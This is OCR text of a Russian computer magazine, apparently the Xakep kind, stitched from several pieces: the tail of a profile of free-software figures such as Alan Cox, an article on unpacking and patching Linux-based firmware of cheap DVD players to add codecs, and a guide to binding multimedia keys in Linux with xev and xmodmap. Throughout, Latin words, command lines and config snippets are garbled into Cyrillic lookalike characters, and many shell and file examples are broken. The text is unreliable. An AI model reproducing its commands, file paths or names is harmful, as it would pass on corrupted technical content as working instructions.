Мигель де Иказа — весьма известная в кругах свободного ПО личность. 

И появился проект не на пустом, конечно же, месте. В то время единст- 



венной альтернативой для обычных пользователей была среда КОЕ. Но 
так как она разрабатывалась посредствам инструментария 0! от фирмы 
ТгоЮесЬ, который являлся продуктом несвободным, сторонники свобод- 
ного ПО терпеть это не стали. ѲЫОМЕ строится на основе СТК+, который 
уже распространяется по лицензии 8І\Ю СРЬ. Сегодня он пользуется 
немалой популярностью — переведен на 31 язык, запускается под боль- 
шинством ІІКІІХ-подобных систем; существует даже порт под ѴѴІпбоѵѵз. 
Х.Огд же — это старое название организации, которая занималась раз- 
работкой системы X ѴѴІпбоѵѵ. С 2004 года процесс координирует фонд 
под названием Х.Огд Еоипба!іоп, основанный выходцами из Х.Огд и 
!геебезк!ор.огд . Сама же X ѴѴІпбоѵѵ 5уз!ет (а в народе просто «иксы») 
была разработана в колыбели компьютерных гениев — в Массачусетском 
технологическом институте (МТИ) еще в далеком 1984 году. Эта оконная 
система используется как плацдарм для обеспечения базовых функций 
графической среды: взаимодействия с клавиатурой и мышью, отрисовки 
окошек на экране и т.д. Иксы поддерживаются всеми современными ОС, 
но в піх-подобных осях это практически стандарт по умолчанию. 

Но помимо программистской деятельности Кокс еще и известный активист. 
Уже давно он выступает против использования патентов лицензирования 
БМСА (Оіді!аІ МІІІеппіит СоругідЬ! Ас!) и СЕЮТРА (Сопзигшег ВгоабЬапб 
апб Оіді!аІ Теіеѵізіоп Ргото!іоп Ас!). И тот и другой законы действуют на 
территории США. Они запрещают не только копирование и распростране- 
ние материалов, защищенных авторскими правами, но и производство и 
распространение технологий, позволяющих обходить системы защиты от 
незаконного копирования. При использовании для этих целей интернета 
ответственность ужесточается, однако одновременно закон ограждает про- 
вайдеров, которые не несут ответственности за действия пользователей. 

В 2001 году с йМСА был связан крупный скандал. Тогда российского про- 
граммиста Дмитрия Склярова прямо на конференции йеЮоп арестовало 
ФБР по обвинению во взломе системы защиты электронных документов 
фирмы АбоЬе. Дело в том, что Скляров разработал алгоритм программы 
Абѵапсеб еВоок Ргосеззог, которая действительно позволяла обходить 
защиту электронных книг формата РБР. На БеЮоп он представил доклад о 
незащищенности электронных книг, и в частности и формата РОЕ. Все это 
он сопроводил примерами с использованием Абѵапсеб еВоок Ргосеззог. И 
после окончания конференции был арестован. Несмотря на то что в итоге 
его выпустили под залог, а потом и вовсе оправдали, Скляров провел в 
тюрьме США несколько месяцев, и этот случай вызвал очень большой 
резонанс. Именно после ареста Склярова Кокс отказался от посещения 
крупной конференции Ызепіх, где числился членом оргкомитета. Также он 
призвал всех программистов, не являющихся гражданами США, бойкоти- 
ровать мероприятия, проводимые на территории Соединенных Штатов, а 
организаторов — устраивать конференции в других странах. «Кто следую- 
щий, выступив на конференции, угодит на несколько лет в американскую 
тюрьму за то, что ничего не совершал?» — задается вопросом Кокс в 
интервью. 

За свои достижения Кокс удостоился ряда премий. Например, ЫпихѴѴогІб 
Аѵѵагбз за общие достижения в 2001 году и Егее 5о!!ѵѵаге Аѵѵагб за вклад 
в разработку ядра Ыпих в 2003 году. Также он является консультантом 
британской организации Ореп РідЬ!з Огоир, которая борется за упразд- 
нение БРМ (йіді!аІ РідЬ!з Мападетеп!). И-И 
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КРИС КАСПЕРСКИ 



Лаем 



ТЕХНИКА ПЕРЕПРОШИВКИ АППАРАТНЫХ БУБ-ПЛЕЕРОВ С НИКСАМИ НА БОРТУ 



Часть людей предпочитает смотреть видео на компьютерёѵ часть использует для этой 
цели автономные БѴІ)-проигрыватели, главным недостатком которых является плохая 
поддержка левых МРЕС4-форматов. Народ вовсю потрошит прошивки, но добавить 
в аппарат новую версию кодека — задача, прямо скажем, нетривиальная. Однако знание 
никсов дает нам сто очков вперед. у . 



оклонники автономных ОѴО-проигрывателей приводят 
множество аргументов в ихзащиту: начиная стого, что видео 
удобнее всего смотреть, развалившись на диване перед 
большим экраном, и заканчивая тем, что домашние больше 
не домогаются до компьютера, а потому покупка йѴй высвобождает кучу 
машинного времени, которое теперь можно расходовать в хакерских целях. 
Как же (Диски, купленные в соседнем ларьке или переписанные у под- 
руги, обычно либо не опознаются вообще, либо воспроизводятся с кучей 
артефактов, сотрясая экран в ужасных конвульсиях. Вот и приходится 
вновь возвращаться к компьютеру (установка свежего кодека на который 
не проблема) или осваиватьазы нелинейного видеомонтажа, занимаясь 
цифровым ремастерингом, перезаписывая фильмы в правильном формате 
на ОѴО-болванку. Но это не есть хакерский путь. 



Чтобы покончитьс проблемами раз и навсегда, необходимо исправить 
ошибки производителя непосредственно в самом плеере. Иногда это уда- 
ется сделать, просто обновив прошивку, скачанную с официального сайта 
или позаимствованную у сотрудников сервис-центра, но гарантий, что она 
действительно исправитситуацию, нетникаких. Конечно, самостоятельная 
трепанация прошивок — занятие не для слабонервных, и это дело требует 
как знания кучи ассемблеров, так и умения держать паяльник в руках. 
Сегодня объяснять, что такое программатор и где его достать, мы не будем. 
Предполагается, что читатель имеетопыт модификации прошивок различ- 
ных устройств и уже давно миновал стадию смены логотипов, русификации 
меню, еіс. Если же нет, рекомендую обратиться к книге креативного хакера 
с острова Ява РІЫСК2АСС0 «ВІ05: дизассемблирование, модификация, 
программирование», в которой все это подробно описано. 
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Ищем сигнатуру дгір’а в прошивке с помощью Иіеѵѵ’а 



Естественно, далеко не каждый ОѴО-плеер может быть хакнут и пофиксен. 
Тут все зависит оттого, какой процент операций декодирования выполня- 
ется программно, а какой — аппаратно. Кстати, чисто аппаратные декодеры 
допускают возможность установки программных фильтров, обрабаты- 
вающих сжатые данные на различных стадиях декодирования, и потому 
теоретически способны исправлять любые ошибки и справляться с новыми 
форматами. Практически же все зависит от мощности видеопроцессора, 
которая обычно выбирается с минимальным запасом. 

Программные декодеры, собранные на базе ПІ5С-процессоров, в этом 
смысле намного более предпочтительны для использования в хакерских 
целях, поскольку одну программную реализацию кодека ничего не стоит 
заменить другой. Хотя и здесь возможны свои нюансы. Например, если де- 
шевый ОѴО-плеер не поддерживает функцию біобаі Моііоп Сотрепваііоп, 
появившуюся в МРЕ64, посколькуу него физически нехватает мощности, 
то, даже если мы засунем прошивку с ѲМС, работать она будетлишь с дис- 
ками, записанными в низком разрешении на малых битрейтах. А по мере 
роста разрешения/битрейта процессор просто не будетуспевать декодиро- 
вать данные, итогда ему придется либотормозить со страшной силой, либо 
дропать кадры. Кстати, умение правильно дропать кадры, нетеряя при этом 
синхронизации со звуком, присуще далеко не всем проигрывателям, но это, 
по крайней мере, лечится доработкой прошивки. 

И ВНУТРИ КОРОБКИ 

Схемотехнические построения ОѴО-плееров настолько многообразны, 
что не поддаются ни какому учету. В зависимости от степени интеграции 
компонентой базы, сердцем проигрывателя может быть как одна мега мик- 
росхема, так и несколько независимых процессоров. Последнее решение 
встречается намного чаще, и обычно на плате можно найти как минимум 
один управляющий микроконтроллер и видеопроцессор, обеспечиваю- 
щий аппаратное декодирование МРЕ61/МРЕ62(МРЕ64). Аудиопроцессор 
может быть как частью видеопроцессора, так и автономной микросхемой. 
Прошивки, которые поставляются в сервис-центры и которые заливаются 
на плеер через ОѴО-диск или путем непосредственного подключения 
специального шнура к плате, относятся (за редким исключением) именно 
к микроконтроллеру, управляющему всеми узлами плеера, но в процес- 
се декодирования никак не участвующему. Во-первых, для этогоу него 
недостаточно мощности, а во-вторых, потокдекодированных данных идет 
в обход него, и он имеет к ним лишь косвенный доступ, достаточный для 
наложения текста субтитров на изображение, но не болеетого. 

Основная работа совершается именно в видеопроцессоре, построенном 
на базе ПІ5С-проца, обрабатывающего микрокод, который можетбыть 
как записан в самом видеопроцессоре, так и расположен во внешней 
перепрограммируемой микросхеме. Последний случай кажется весьма 




На сайте йтред.трІауегЬц.Ьи всегда можно скачать последнюю версию 
библиотеки ЕЕМРЕ6 

соблазнительным для хакерства. Действительно, чисто аппаратных МРЕ6- 
декодеров нет ни у кого (и никогда не будет), и потому добавление новых 
кодеков не должно вызвать непреодолимых проблем. Во всяком случае, 
если плееруже поддерживает хотя бы какую-то разновидность МРЕѲ4,тоу 
него хватит сил поддержать и остальные, пускай и не без оговорок по бит- 
рейту и прочим фишкамтипа 6МС, упирающимся в мощность процессора. 
Практически же РІЗС-ядро поддерживает ни с чем не совместимый и 
абсолютно недокументированный набор команд, под который нет ни ди- 
зассемблеров, ни трансляторов. Даже если за основу взято ядро популяр- 
ного процессора, набор команд все равно существенно изменен с целью 
оптимизации под конкретную задачу. В частности, поддержка цветового 
пространства ѴІІѴ1 2, где на каждый канал отводится по 1 2 бит, обуслав- 
ливает появление команд, работающихс 1 2-битными данными. Увы, 
видеопроцессор — вещь в себе, и его микрокод является собственностью 
производителя. 

Спрашивается, а где же тут Еіпих/хВ50?!Уже на подходе. Немного терпения. 
Китайцы, как известно, дерут все, до чего только им удается дотянуться, и 
попате йУО-плеер, собранныйумельцем по имени Ляо, при ближайшем рас- 
смотрении очень часто оказывается плохой копией хорошего японского плее- 
ра. Содрать чужое (и притом лучшее) экономически выгоднее, чем разрабаты- 
вать все самому с нуля. Но воровать нужнотоже сумом, выкидывая максимум 
деталей и заменяя дорогие комплектующие их дешевыми аналогами. 
Завышенная цена на продукцию ведущих фирм не в последнюю очередь 
связана с необходимостью выплаты лицензионных отчислений отцам-ос- 
нователям проприетарных видео-/аудиоформатов, и потому чем больше 
форматов поддерживаетаппарат, тем он дороже. И самым дорогим узлом 



Чем занимаемся 

*піх-системами на ПК сегодня уже никого не удивишь. А потому в 
порядке эксперимента мы решили сменить привычный х86 на не- 
традиционную процессорную ориентацию, рассмотрев особенности 
размножения никсов во встраиваемых системах, а конкретнее в авто- 
номных ПѴЛ-приводах, скрывающих внутри своих прошивок жестоко 
урезанное ядро Ілпих или ИеЙЗЗП. Именно эту прошивку мы и будем 
хачить, добавляя поддержку новых кодеков и исправляя ошибки в уже 
имеющихся. В конце концов, если мы за свободный софт, то нужно 
следовать духу ореп зоигсе не только на компе, но и на всем остальном 
оборудовании. 
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ЮА Рго дизассемблирует код прошивки, предназначенной для АРМ 

оказывается именно видео-/аудиопроцессор, в стоимость которого уже 
включены все отчисления. И какой же китаец в здравом уме и трезвой 
памяти будет за купать видеопроцессоры, особенно если их ему не продают, 
поскольку они разработаны непосредственно самим производителем плее- 
ра, ну или субподрядчиком, работающим на производителя по спецзаказу? 
Содрать же видеопроцессор и самому изготовить точнотакой же техни- 
чески возможно, но... только вусловиях крупной лаборатории. Подвалы и 
гаражи для этого никак не подходят. И всеже китайцы его как-то переди- 
рают. Как?! Аочень просто. Они кладут известный орган на неизвестное 
РІЗС-ядро и, вместо того чтобы послойно раздербанить микросхему на 
сканирующем электронном микроскопе, копируют достаточно хорошо доку- 
ментированный интерфейс видеопроцессора с внешним миром. 

При этом они очень часто используют широко распространенный РІЗС-процес- 
сор (например, АРМ) и... открытую библиотеку РРтред, для обеспечения рабо- 
тоспособности которой в прошивку заливается урезанное до безобразия ядро 
І_іпих’а или ЫеШЗй, а точнее малая часть ядра. Какминимум от ядра остается 
аллокатор — набор функций для работы с динамической памятью. Компилиру- 
ется всеэтодело, естественно, с помощью 6СС, причем в библиотеку РРтред 
вносится минимум изменений. Китайцы тоже не дураки, какой им резон при 
«заимствовании» новой версии РРтред повторять работу по ее адаптации с 
нуля?Ониже ни от кого не шифруются. И на все юридические проблемы лицен- 
зирования плюютсТянь-Шаня. Конечно, это только попате плюют. Акактолько 
дядюшка Ляо выбирается изтемных подвалов вустремившиеся вверх небо- 
скребы, тутуже выгоднее становится вставлять в плеер аппаратные декодеры от 
сторонних производителей, чем реализовать их на коленках самостоятельно. 
Хачитьбрендовые проигрыватели — бесперспективно, и для полного 
счастья нам нехватаеттолько ОѴй с чисто программным декодером. По 
каким признакам его можно отличить от остальных? Во-первых, это большое 
количество поддерживаемых аудио/видео-форматов, перечень которых 
коррелируете послужным списком библиотеки РРтред. Проигрыватели, по- 
ни мающие только МРЕ61/МРЕ62, — явно не наш клиент, и они идут лесом. 
Во-вторых, сняв крышку (а ее все-таки придется снять), мы должны обнару- 
жить достаточно мощный РІЗС-процессор (АРМ7 с крейсерской скоростью в 
56 МГц может быть только управленцем, но никак не декодером, а вотАРМ9 
200 МГцуже может декодировать МРЕ64, записанный без наворотов), харак- 
терную микросхему перепрограммируемой памяти рядом с ним и необычно 
большое количество буферных ОЗУ (необычно большое для аппаратных де- 
кодеров). Собственно говоря, именно буферные ОЗУ и позволяют отличить 
управляющий микроконтроллер от программного видеодекодера. 

Чтобы не маньячить прямо в магазине (где вскрывать крышку нам все 
равно не дадут), необходимо заранее изучить доступный модельный ряд и 
нарыть необходимую информацию в интернете. Если повезет, мы откопаем 
нетолько фотографии платы, но еще и принципиальную схему, которая, 




Так выглядит РІЗС-процессор АРМ9 отАТМЕЦ часто используемый в каче- 
стве программного декодера в ОѴО-проигрывателях 

впрочем, необязательна. Как вариант, можно приобрести поддержанный 
ОѴй с руку приятеля или, натянув сапоги, совершить набег на любой более- 
менее приличный радиорынок, где продавцы в курсе темы и знаюттовар, 
который они продают. Собственно говоря, попате-продукция распро- 
страняется преимущественно через рынки. В салонахбытовойтехники ее 
можно встретить только с перепугу. Оно и понятно. Салоны предпочитают 
брать продукцию фирм, имеющих развитую сеть сервисных центров, обес- 
печивающих хотя бы гарантийный ремонт. 

Конечно, качество у попате-продукции не ахти, и радости оттого, что хак- 
нутый плеер будет воспринимать все форматы... Ну о какой радости можно 
говорить, если звук кошмарный, а изображение просто отвратное?.. Нотут 
все нетакоднозначно. Не факт, что, заплатив за брендовый проигрыватель, 
мы получим достойное качество, особенно если речь идет о пережатых 
М РЕ04-дисках со звуком в трЗ. Писатьже МРЕ04 с малым сжатием и 
оригинальным многоканальным звуком смысла нет, поскольку по размеру 
получится тот же самый ОѴО. Да и сами ОѴО, продающиеся на российских 
просторах, обычно получены из каких-то левых источников, даже если они 
выдаютсебя за крутые лицензионные. 

Качественные видео/звук и плеер с поддержкой МРЕ64 несовместимы по 
определению. Если такуж важно качество, то достаточно прибрести любой 
приличный ОѴО- проигрыватель из серии МРЕѲ1/МРЕ62 опіу. Если же мы 
хотим поэкспериментировать, берем попа те- ОѴО с программным декоде- 
ром и хачим прошивку по полной программе, добавляя туда новые кодеки. 
Этим мы, собственно, сейчас и займемся. 

В МОЧИМ ПРОШИВКУ 

Микрокод программных видеодекодеров особой оригинальностью не 
отличается. Сначала управление передается на неупакованный ЬооМблок 
(расположенный в самом конце дампа), который выполняет некоторую 
первичную диагностику, инициализирует процессор с контроллером 
памяти и передаетуправление распаковщику. С распаковкой китайцы 
особо незаморачиваются, и прошивка, как правило, упакована стандарт- 
ным для *піх-систем дгір’ом.такчто эта процедура проходит без проблем. 
Начало упакованного блока в этом случае отмечено сигнатурой 1 ЕИ 8Е>Ь 
086. Просто загружаем дамп прошивки в Ьіеѵѵ, выделяем блоком, копируем 
в файл и натравливаем на него дгір. Если же братья китайцы использовали 
самопальный упаковщик (временами с ними это случается, причем, судя по 
стилю кодирования, пишутони его под саке), изучаем код распаковщика в 
ЮЕ и здесь же, в ЮЕ, пишем свой собственный скрипт для распаковки. 
Распакованная прошивка имеет модульную структуру, последовательно 
копируемую в разные части буферного ОЗУ. Часть модулей содержит код 
операционной системы (или, точнее, все, что от него осталось), часть 
обеспечивает поддержку ввода/вывода и примитивной файловой системы, 
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содержащей довольно большое количество кодеков. 

Кодеки могут представлять собой как двоичные файлы своего собствен- 
ного формата, так и обычные ЕІ_Р-файлы. В любом случае кодеками управ- 
ляет менеджер, передающий им закодированныеаудио-/видеоданные и 
забирающий распакованную информацию. В зависимости от количества 
саке, принятого разработчиками, видеопроцессор может либо работать в 
режиме реального времени (то есть выдавать декодированную информа- 
цию в строго определенные моменты времени), либо просто валить резуль- 
таты декодирования в буферное ОЗУ, перекладывая заботу о его дальней- 
шей судьбе на плечи других микросхем. Все это необходимоучитывать при 
добавлении новых кодеков или модификации уже существующих. 
Собственно, процедура добавления нового кодека довольно проста. Так 
каку нас есть некоторое подобие файловой системы, достаточно положить 
туда еще один файл, после чего упаковать все модули обратно дгір’ом , 
приклеить оригинальный Ьооі-блок, пересчитать все контрольные суммы и 
залить прошивку назад в микросхему с помощью программатора. 

Труднее всего выяснить формат кодеков. Он будетявно не от М5. И никаких 
ста н да рто в н а этот с ч ет у н а с н ет. А п ото му п р иход ится л и бо п отро ш ить коде ки , 
входящие в состав исходной прошивки, либо дизассемблировать их менеджер, 
состоящий из десятков килобайткода. В простейшем случае кодек пред ста в- 
ляетсобой обычный ЕІ_Р, экспортирующий несколько функций, среди которых 
есть функция сусловным названием сИеск_Ьгтаі. Ей передается аудио-/ви- 
деопоток, и она должна сказать, готов л и этот кодек его декодировать или нет. 

В плане хака это наилучший вариант, поскольку мы можем добавить поддержку 
абсолютно любых форматов сжатия и контейнеров, использующихся для их 
хранения. Хуже, если кодек представляет собой бинарный файл, в определен- 
ной позиции которого содержится списоксигнатур (например, кодов іюигсс), 
соответствующих за головкам форматов, которые он готов обрабатывать. В этом 
случае первичный парсингформата делает менеджер кодеков, и потому нужно 
быть готовым ктому, что его придется сильно править. 

Хак прошивок немыслим без отладки, но... с отладкой сплошные 
напряги. Писать эмулятор видеопроцессора со всем его окружением 
слишком муторно, долго и совершенно нецелесообразно, ктомуже при 
отсутствии спецификации никогда нельзя быть уверенным, что наш 
эмулятор правильный. Ничего другого не остается, как прибегнуть к 
отладочной печати. Для этого кодеку достаточно выводить текстовые 
строки, накладывая их поверх распакованных видеоданных. В идеале, 
конечно, стоило бы прикрепить активацию отладчика к определенной 
комбинации кнопок на пульте/лицевой панели плеера, но, увы, видеоп- 
роцессору кнопки недоступны, и это потребует модификации основной 
прошивки управляющего микропроцессора. А нам ее модифицировать 
совсем не хочется. Поступим проще. Изготовим специальный отладоч- 
ный видеодиск, содержащий определенную последовательность байт 
в заголовке/видеопотоке, обнаружив которую, кодекдолжен задейс- 
твовать режим отладочной печати и не выключать вплоть до аппарат- 
ного ресета/перезагрузки — иначе кактогда отлаживать проблемные 
диски?! То есть отладочный дисктолько активирует печать, а сам по 
себе может даже не содержать никакой актуальной видеоинформации. 
К сожалению, это не всегда можно сделать, поскольку у некоторых 
моделей плееров ресет видеопроцессора происходит автоматически 
при каждой сменедиска. 

Н ЗАКЛЮЧЕНИЕ 

Мыщъх не претендует на создание полного, законченного и исчерпываю- 
щего руководства по хаку ОѴО-прошивок. В силу многообразия схемо- 
технических решений ОѴО-проигрывателей это попросту невозможно, к 
тому же элементарная база не стоит на месте, а интенсивно обновляется. 

Не стоят на месте и форматы компрессии аудио-/видеоданных. Но полное 
руководство и ненужно. Мы же, как истинные хакеры, ориентированы не на 
конечный результат, а на сам процесс его достижения. 

Главное — это выбрать изначально правильное направление. Уяснить, что 
хак прошивок вообще возможен и что никсы поджидают нас даже там, где 
мы совсем их не ожидаем. Открытые проекты — действительно великая 
вещь, доказывающая превосходство хакерского братства над корпоратив- 
ным интересом кобогащению путем монополизации права на обладание 
программным кодом, □с 
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мультимедийные клавиши 



Большинство современных клавиатур снаб- 
жено мультимедийными клавишами, да и 
мышки уже имеют от трех до семи кнопок. 
На диске, идущем в комплекте, и на сайте 
производителя доступны драйверы и вся- 
ческие полезные программы только для 
ѴѴтсІоѵѵж Всем известно, что Ілпих славится 
своей возможностью настроить систему под 
себя, если, конечно, знать, где и что настра- 
ивать. Наша задача — научить пингвина 
работать с дополнительными баттонами. 



ипіхоігі 



ЮРИЙ «ВОВ ЕК» РАЗЗОРЕНОВ 

/ 2І_ОѴ.ВОВК@СМАІІ_.СОМ 

Нихт 

ферштейн 



ЧИМПИНГВИНАПОНИМАТЬ 



Н ОПРЕДЕЛЕНИЕ СКАН-КОДА КЛАВИШ 

Что бы ты там не нажимал на своей клавиатуре, Х-серверу и ядру, в об- 
щем-то, все равно, что на ней написано или нарисовано. Их интересу- 
ют исключительно скан -код кнопки, причем сначала иксы считывают 
таблицу кодов клавиш ядра, а затем уже код клавиши привязывается 
к собственной таблице кодов. Если в ѴѴІпсІоѵѵз проблемы настройки 
мультимедийных клавиш в консоли как таковой не существует, то в 
І_іпих приходится отдельно настраивать реакцию на нажатие кнопок в 
консоли и в Х-ѴѴІпбоѵѵ. 

Чтобы узнать код клавиши, следует использовать утилиту хеѵ, вхо- 
дящую в состав Х-сервера. После ее запуска появляется окно Еѵепі 
Тезіег, теперь последовательно нажимаем клавиши, запоминая 
выдаваемый код: 

$ хеѵ 

КеуКеІеазе еѵепі , зегіаі 31, зупіЬеІіс N0, шіткж 
ОхЗеООООІ , 

гооі 0x67, зиЬм 0x0, Ііте 279734676, (311,611) , 
гооі : (1104,687) , 

зіаіе 0x2000, кеусосіе 236 (кеузуш 0x10081119, 
ХР86Маі1) , заше_зсгееп УЕ8, 

ХЬоокирЗІгіпд діѵез 0 Ьуіез : 



ХРіІІегЕѵепІ геіигпз : Раізе 
КеуКеІеазе еѵепі , зегіаі 31, зупікеііс N0, ѵ/іпскж 
0x2600001, 

гооі 0x67, зиЪм 0x0, Ііше 265877259, (883,334) , 
гооі : (886,358) , 

зіаіе 0x0, кеусосіе 161 (кеузуш 0x0, ЫоЗутЪоІ) , зате_ 
зсгееп УЕЗ , 

ХЬоокирЗІгіпд діѵез 0 Ьуіез : 

ХЕіІІегЕѵепІ геіигпз: Еаізе 

Вывод можетбыть огромен, так как отслеживается каждое движение 
мышки при проходе над окном ЕѵепіТезіег. Клавишу описывает блок 
КеуПеІеазе, в частности, значение кеусобе как раз и является скан-кодом, 
который мы хотим узнать. В приведенном примере нажаты две клавиши. 
Клавише с кодом 236 соответствует код клавиши для Х-сервера, указанный 
в кеузут, а также действие ХР86МаіІ, которое в КИЕ запускает используе- 
мый поумолчанию почтовый клиент. Для клавиши с номером 161 код и 
действие не определены. 

Возможна ситуация, когда клавиша нажимается, но ее скан-код не выда- 
ется. Это означает, что ядро не может найти соответствующее значение. В 
выводе сітезд должна быть такая строка: 

Ьзе ' зеікеусосіез Охес <кеусосіе>' Іо шаке іі кпоѵш. 
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То есть тебе предлагают установить скан -код клавиши самостоятельно 
при помощи зеікеусосіеБ, при этом значение кеусобе выбрать очень 
просто. Переведи полученную цифру в десятичное число (большинство 
калькуляторов это умеют) и прибавь 128. В данном примере 0хес=236, 
то есть получаем скан -код 364. Если есть со мнения, список задейство- 
ванных и незадействованных скан-кодов можно просмотреть, запустив 
в консоли утилиту деікеусосіез или битркеуз. Например, если вывод 
«деікеусосіеБ I дгер <код клавиши>» ничего не дал, значит этот код 
можно смело использовать. 

Помочь определить скан-код способна и утилита ХКеусарз ( ѵѵѵѵѵѵдѵѵг.огд/ 
хкеѵсарБ І. которая является графическим фронт-эндом кХтосІтар. 

В консоли программа хеѵ, разумеется, не работает. Чтобы узнать скан- 
код, выдаваемый ядром, следует использовать утилиту збоѵѵкеу или 
деікеусосіеБ: 

$ збюѵбкеу 

клавиатура была в режиме ШІСОБЕ 

нажмите любую клавишу (программа завершится через 10 сек 

после последнего нажатия) . . . 

ОхеО Охбс ОхеО Охес 

Первые две цифры соответствуют нажатой клавише, вторые — отсутствию 
нажатия. 



^ ипіхоісі 




Вы вод утилиты хеѵ 



В НАСТРОЙКА ПРИВЯЗКИ СКАН-КОДОВ В Х-ѴѴШООѴѴ 

Итак, скан-коды теперьу нас есть, нужно указать Х-серверу, что он, собс- 
твенно, должен делать при нажатии этой клавиши, то есть присвоитьей 
символьное имя. Список символьных имен приведен в файле заголовков 
ХР86кеу5ут.Ь. Поумолчанию заголовочные файлы Х-сервера в совре- 
менных дистрибутивах не устанавливаются. Чтобы увидеть его в ІІЬипіи, 
нужно установить пакетхі 1 ргоіо-соге-сіеѵ, после чего этот файл будет 
лежать в каталоге /изг/іпсІисіе/Х1 1 . Как вариант — можно обратиться к 
СѴ5-серверуХ.0гд [ ѵѵеЬсѵ5.1геесІе5к1ор.огд/хогд/рго1о/Х1 1/ХЕ86кеу5ут. 
Ь?ѵіеѵѵ=[од&раіЬгеѵ=Х0Р6-СЦРРЕМТ ). Смотрим: 

$ саб /изг/іпс1ис(е/Х11/ХР86кеузут. Ъ. 

/* * 

* Кеуз боипб оп зоте " Іпбегпеб" кеуЬоагбз . 

*/ 

#бебіпе ХР86ХК_8бапс1Ъу 0х1008РР10 

#бебіпе ХР8бХК_АибіоЬоілегѴо1ите 0х1008РР11 
#бебіпе ХР8бХК_АибіоКаізеѴо1ите 0х1008РР13 
#бебіпе ХР8бХК_АибіоРІау 0х1008РРІ4 

#бебіпе ХР 8 б ХК_Аиб і о 3 б ор 0х1008РРІ5 

#бебіпе ХР8бХК_Маі1 0х1008РРІ9 

Если мы сравним последнюю строку с выводом хеѵ, то увидим, чтозначения 
совпадаютс клавишей с кеусобе 236 — кеузут 0x1 008Ш9, ХЕ86МаіІ (без 
суффикса ХК_). Списоквсехдоступныхзначений втом виде, в каком они 
должны использоваться, ты найдешь в/изг/збаге/ХІ 1/ХКеузутОВ. 
Составить свой вариант раскладки можно двумя способами: создатьопи- 
сание своей клавиатуры или использоватьХтобтар. Последний способ 
самый простой, поэтомуо нем и будем говорить далее. В домашнем ката- 
логе пользователя создаем файл .Хтобтар, в который заносим желаемые 
значения: 

$ МСЕОІТ -/.ХМООМАР 

кеусобе 161 ХР86Са1си1абог 
кеусобе 174 ХР8бАибіоРоілгегѴо1ите 
кеусобе 176 ХР8бАибіоКаізеѴо1ите 
кеусобе 162 ХР86АибіоРаизе 

И та к дал ее, принцип, думаю, ясен. Причем код клавиш можно заносить 
каквдесятичном.таки шестнадцатеричном виде. По моим наблюдениям, 
коды большинства клавиш стандартизированы. Поэтому, если ты один раз 
настроишь реакцию на нажатие клавиши и перенесешь файл на другой 
комп, есть вероятность, что на другой клаве реакция на нажатие также 
подписанной клавиши будетаналогичная. Пользователи рабочего стола 
Споте с СйМ могут прописать все эти строки в общесистемный файл 
/е1с/Х1 1/Хтобтар. 

В других случаях нам еще нужно указать Х-серверу, чтобы он использовал 
созданный файл. В разных дистрибутивах это реализовано по-разному, 
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основная идея состоит в запуске команды /ивг/Ьіп/хтосітар $Н0МЕ/. 
Хтосітар при входе пользователя в систему или при старте X. Тут уже каж- 
дый танцует, какхочет. На форумах предлагают использовать файл $Н0МЕ/. 
хвезвіоп (в некоторых дистрибутивах он может называться .Хзевзіоп), 
.хргобіе или системный /еѣс/ХІ І/Хвезвіоп. И боюсь, что это далеко не все 
возможные варианты. Давай посмотрим, каксделано в КІІЬипіи: 

$ зисіо дгер -ік хшосітар /еРс 

В результате находим прелюбопытнейший файл /еѣс/ХІ 1/Хвеввіоп. 
б/80иЬип*и-хгтюсІ тар такого содержания: 

$ САТ /ЕТС/Х 1 1/Х5Е55ЮМ.О/80ивиМТи-ХМООМАР 

/изг/Ъіп/хтосІтар /изг/зНаге/аррз/кхкЪ/иЪипСи .хтосітар 

I I Ргие 

П8ЕМОБМАР= " $НОМЕ / . Хтосітар " 

ІР [ -х /изг/Ьіп/хтобшар ] ; Ыгеп 
ІР [ -1 " $иЗКМОБМАР" ] ; Ркеп 

/изг/Ьіп/хшосішар " $иЗКМОВМАР" | | Ргие 
Рі 

Рі 

То есть загружается содержимое файла иЬипіи.хтосІтар и пользователь- 
ский .Хтобтар, если он существует. Открыв в редакторе иЬипШ.хтосІтар, 
ты обнаружишь список кеусосіе и сопоставленные символьные имена. 
Отсюда можно сделать вывод: если разработчик сообщает о том, что его 
дистрибутив поддерживает мультимедийные клавиатуры, то с большой 
долей вероятности можно найти подобный файл. В других дистрибутивах 
присутствуетаналогичная система запуска пользовательских хтобтар- 
файлов. 

Теперь, когда символьные имена клавишам присвоены, можно 
назначать им желаемые действия. Некоторые оконные среды вроде 
КОЕ умеют отрабатывать действия по символьным именам. Так, при 
нажатии кнопки с ХЕ86АибіоРІау начинает воспроизведение плеер, 
используемый по умолчанию. Чтобы установить нужную комбина- 
цию, достаточно зайти в «Центр управления КОЕ -> Региональные и 
специальные возможности -> Комбинации клавиш» (в КІІЬипІи ищи в 
«Зувіепп ЗеШпд КеуЬоагб & Мойве»). Аналогичный пункт меню есть 
и в 6 поте (можно просто вызвать дпоте-кеуЬоагб-ЬіпсІіпдв), и в ХРсе. 
Плюс некоторые программы вроде Ата го к, Копдиегог, МРй также 
умеют обрабатывать нажатия клавиш. В других средах, не имеющих 
графических средств настройки, скорее всего, потребуется ручное 
вмешательство в конфигурационные файлы. Например, чтобы в ІсеѴѴМ 
по нажатии клавиши с символьным именем ХР86АибіоРІау запускался 
проигрывательХММЗ, а при повторном нажатии он становился на 
паузу, в файл -/.ісеѵѵт, появляющийся после первого запуска, следует 
добавить строку: 



$ МСЕйІТ -/.ІСЕѴѴМ 

кеу ХР86Аис1іоРІау хшшз --ріау-раизе 
В РІихЬох строка для запуска проигрывателя будет выглядеть так: 

$ МСЕйІТ -7.РШХВ0Х/КЕѴ5 

Ыопе ХР8 6Аис1іоРІау : РхесСошшапсі хшшз --ріау-раизе 

В конфигах обычно есть примеры, поэтому состальными оконными менед- 
жерами, думаю, ты безтруда разберешься сам. 

Н НАСТРОЙКА РЕАКЦИИ В КОНСОЛИ 

В консоли порядокдействий несколько иной. Какты помнишь, вывод 
бтезд рекомендовал назначить клавишные коды с помощью команды 
зеікеусобез. Но здесь есть отличия — клавишных команд в консоли не 
может быть больше 128, следует выбирать значения от 0 до 127: 

$ зеккеусосіез Охес 118 

Посмотретьсвободныезначения можно в файлетекущей клавиатурной 
раскладки. В ІІбипіи и всех дистрибутивах, базирующихся на ОеЬіап, это 
обычноМс/сопзоІе-зеІир/ЬооШте.ктар.дА Если послезапуска проблем с 
клавишами нет, заносим эту строку в один из стартовых скриптов, например 
вМс/іпіі.сІ/гс.ІосаІ. 

Теперь осталось задать соответствие клавиши и выполняемого действия. 
